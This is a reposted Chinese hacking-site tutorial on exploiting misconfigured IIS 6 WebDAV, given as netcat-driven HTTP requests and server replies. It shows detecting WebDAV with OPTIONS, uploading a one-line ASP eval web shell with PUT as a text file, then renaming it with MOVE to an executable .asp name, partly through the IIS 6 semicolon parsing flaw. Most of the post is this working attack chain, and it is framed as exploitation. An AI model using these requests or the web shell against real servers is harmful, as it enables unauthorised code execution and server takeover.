记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

IIS WEBDAV安全配置问题利用

2013-10-12 17:15
参考: http://www.hackdig.com/Article/201307/228165.html
 
利用工具 nc
 
第一步:判断
 
nc 192.168.56.101 80
OPTIONS / HTTP/1.1
Host: 192.168.56.101
返回
 
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2013 03:11:32 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV。
 
 
 
第二步:
 
此时可以用PUT上传文件,但是不可以直接上传可执行脚本文件,可以先上传一个其他类型的文件。
 
PUT /test.txt HTTP/1.1 
Host:192.168.56.101 
Content-Length:23 
 
<%eval request("a")%> 
 
 
返回
 
HTTP/1.1 201 Created
Date: Tue, 03 Sep 2013 03:19:11 GMT
Server: Microsoft-IIS/6.0
Location: http://192.168.56.101/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
说明test.txt创建成功了。
 
这步需要条件:启用了“WebDAV”扩展,并且复选了“写入”,就可以写入txt文件了
 
第三步:
 
1、利用iis6解析漏洞,把文件move 成 test.asp;.jpg
 
MOVE /test.txt HTTP/1.1
Host : 192.168.56.101
Destination:http://192.168.56.101/test.asp;.jpg
需要条件:存在iis6解析漏洞
 
2、直接move 成test.asp
 
MOVE /test.txt HTTP/1.1
Host : 192.168.56.101
Destination:http://192.168.56.101/test.asp
需要条件:复选上“脚本资源访问”
知识来源: www.2cto.com/Article/201310/249284.html

阅读:82675 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“IIS WEBDAV安全配置问题利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词